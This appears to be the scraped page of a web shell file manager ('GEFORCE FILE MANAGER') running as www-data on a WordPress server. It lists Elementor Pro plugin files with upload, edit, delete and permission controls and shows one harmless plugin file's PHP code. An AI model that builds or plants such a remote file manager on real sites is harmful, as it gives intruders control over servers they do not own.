[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
base
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 base-carousel-trait.php
38,648 B
SET
[ EDIT ]
|
[ DEL ]
📄 base-widget-trait.php
329 B
SET
[ EDIT ]
|
[ DEL ]
📄 base-widget.php
259 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-one-trait.php
270 B
SET
[ EDIT ]
|
[ DEL ]
📄 module-base.php
332 B
SET
[ EDIT ]
|
[ DEL ]
📄 on-import-trait.php
3,989 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: editor-one-trait.php
<?php namespace ElementorPro\Base; use ElementorPro\Plugin; if ( ! defined( 'ABSPATH' ) ) { exit; } trait Editor_One_Trait { protected function is_editor_one_active(): bool { return (bool) Plugin::elementor()->modules_manager->get_modules( 'editor-one' ); } }